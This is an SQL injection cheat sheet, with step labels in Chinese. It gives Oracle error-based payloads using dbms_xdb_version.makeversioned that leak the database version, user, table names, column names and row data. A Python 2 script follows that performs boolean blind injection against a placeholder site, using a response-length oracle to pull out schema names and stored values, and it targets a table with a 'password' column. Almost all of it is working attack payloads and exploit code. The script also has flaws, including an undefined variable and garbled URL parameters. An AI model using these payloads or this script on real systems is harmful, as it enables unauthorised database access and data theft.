获取数据库版本
a' or (select dbms_xdb_version.makeversioned((select banner from sys.v_$version where rownum like 1)) from dual) like 'a
获取用户名
a' or (select dbms_xdb_version.makeversioned((select user from dual)) from dual) like 'a
获取表名
a' or (select dbms_xdb_version.makeversioned((select table_name from all_tables where rownum like 1)) from dual) like 'a
获取下一个表名
a' or (select dbms_xdb_version.makeversioned((select table_name from all_tables where rownum like 1 and table_name not like 'DUAL')) from dual) like 'a
获取表中的列名
a' or (select dbms_xdb_version.makeversioned((select column_name from all_tab_columns where table_name like 'SYSTEM_PRIVILEGE_MAP' and rownum like 1)) from dual) like 'a
获取下一个列名
a' or (select dbms_xdb_version.makeversioned((select column_name from all_tab_columns where table_name like 'SYSTEM_PRIVILEGE_MAP' and rownum like 1 and column_name not like 'PRIVILEGE')) from dual) like 'a
获取数据
a' or (select dbms_xdb_version.makeversioned((select name from SYSTEM_PRIVILEGE_MAP where rownum like 1)) from dual) like 'a
extractvalue(rand(),+concat(0x3a,substring(version(),1,30)))
import requests
# Base URL the probe text is spliced into. The host is a placeholder ("www.test.com")
# exactly as written; url1 is everything before the injected condition and url2
# everything after it, so every request is url1 + <condition> + url2.
url1 = "https://www.test.com/search/index/?param1=1+or+"
# NOTE(review): the "¶" characters in url2 look like extraction garbling of the
# original literal; the string is kept byte-for-byte here.
url2 = "--+¶m2=aaa¶m3=1"
# 盲注获取数据长度
def getlength(payload):
    """Blind-probe an integer via a response-length oracle.

    ``payload`` is an injected condition that ends in ``=``. The function
    appends successive integers 0, 1, 2, ... to it and issues one GET per
    guess (url1 + payload + N + url2) until the response body is at least
    70000 bytes, which it treats as "condition true". It prints and returns
    the first such integer.

    From a monitoring standpoint the traffic is distinctive: a run of
    near-identical requests to one endpoint differing only in a trailing
    counter, with a sharp jump in response size on the final one. The loop
    has no upper bound, so it keeps issuing requests for as long as no
    response reaches the threshold.
    """
    length = 0
    url = url1 + payload + str(length) + url2
    #print url
    r = requests.get(url)
    while(len(r.content) < 70000): # the oracle: a body of 70000+ bytes is read as "condition true"
        length = length + 1
        payload_tmp = payload + str(length)
        url = url1 + payload_tmp + url2
        r = requests.get(url)
    print length  # Python 2 print statement
    return length
#盲注对字段每个字符逐一爆破
def getstr(payload):
    """Blind-probe a single character via the same response-length oracle.

    ``payload`` is an injected expression expected to yield one character.
    For each candidate ``c`` in ``all_str``, in order, the function appends
    ``='c'`` to the payload and issues one GET; the first candidate whose
    response body is at least 70000 bytes is printed and returned.

    Detection note: recovering one character costs up to ``len(all_str)``
    requests that differ only in the quoted candidate. If no candidate
    triggers the oracle, ``i`` runs past the end of ``all_str`` and the
    index raises IndexError.
    """
    i = 0
    #all_str = "_abcdefghijklmnopqrstuvwxyz"
    # Candidate alphabet, tried strictly in this order.
    all_str = "_.-@%$#!<>'?abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ"
    like_str = "='" + all_str[i] + "'"
    url = url1 + payload + like_str + url2
    r = requests.get(url)
    while(len(r.content) < 70000):  # same 70000-byte oracle as getlength
        i = i + 1
        like_str = "='" + all_str[i] + "'"
        url = url1 + payload + like_str + url2
        #print url
        r = requests.get(url)
    print all_str[i]  # Python 2 print statement
    return all_str[i]
# --- Script body: executes at import time, one probe chain after another. ---
# The schema and table are named literally as 'database' and 'table' in every
# query below; those are placeholders exactly as written on the page.
# database name
database_length = getlength("length(database())=")
database_str = ""
# One getstr call (and therefore one burst of requests) per character position.
for i in range(1, database_length + 1):
    payload = "(substr(database()," + str(i) + ",1))"
    database_str += getstr(payload)
# table name
table_count = getlength("(select+count(*)+from+information_schema.tables+where+table_schema='database')=")
table_name_str = ""
# NOTE: table_name_len is not assigned anywhere on this page, so this loop
# raises NameError as written.
for i in range(1, table_name_len + 1):
    payload = "(substr((select+table_name+from+information_schema.columns+where+table_schema='database'+and+column_name='password'+limit+0,1)," + str(i) + ",1))"
    table_name_str += getstr(payload)
# column names in the table
colume_count = getlength("(SELECT+COUNT(*)+FROM+information_schema.COLUMNS+WHERE+TABLE_SCHEMA='database'+AND+TABLE_NAME='table')=")
for i in range(0, colume_count):
    column_name_length = getlength("length((select+column_name+from+information_schema.columns+where+table_schema='database'+and+table_name='table'+limit+"+str(i)+",1))=")
    columu_name_str = ""
    for j in range(1, column_name_length + 1):
        payload = "(substr((select+column_name+from+information_schema.columns+where+table_schema='database'+and+table_name='table'+limit+"+str(i)+",1)," + str(j) + ",1))"
        columu_name_str += getstr(payload)
    print columu_name_str  # Python 2 print statement; one line per column
# fetch data
data = ""
data_len = getlength("length((select+val+from+table+order+by+create_time+desc+limit+0,1))=")
print data_len
for i in range(1, data_len + 1):
    payload = "(substr((select+val+from+table+order+by+create_time+desc+limit+0,1)," + str(i) + ",1))"
    data += getstr(payload)
print data